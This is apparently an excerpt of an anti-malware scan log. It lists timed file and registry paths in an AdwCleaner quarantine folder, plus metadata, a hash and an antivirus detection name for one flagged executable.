          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.9s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          1.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          1.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          1.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          1.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          1.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          1.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          1.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          1.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          1.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          1.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          1.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          1.2s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          1.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          1.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          1.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          1.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          1.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          1.3s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          1.4s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          1.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.5s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.6s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.7s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.7s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.7s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.8s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.9s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.9s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          2.0s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          2.0s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          2.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          2.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          2.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          2.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          6.4s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.5s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.6s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.8s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.5s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          8.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.5s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
      Size . . . . . . . : 266.752 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.5
      SHA-256  . . . . . : DA6B9B43AC78E6A085791CD71125521257B421855D6B17205297D1ACC7637A0C
      Product  . . . . . : W
      Publisher  . . . . : .
      Description  . . . : agent
      Version  . . . . . : 2.6.8.5785
      Copyright  . . . . : Copyright (C) 2015
      LanguageID . . . . : 1033
    > Bitdefender  . . . : Gen:Variant.Razy.103352
      Fuzzy  . . . . . . : 103.0
      Forensic Cluster
         -1.8s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.8s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.4s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.2s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.1s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.8s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
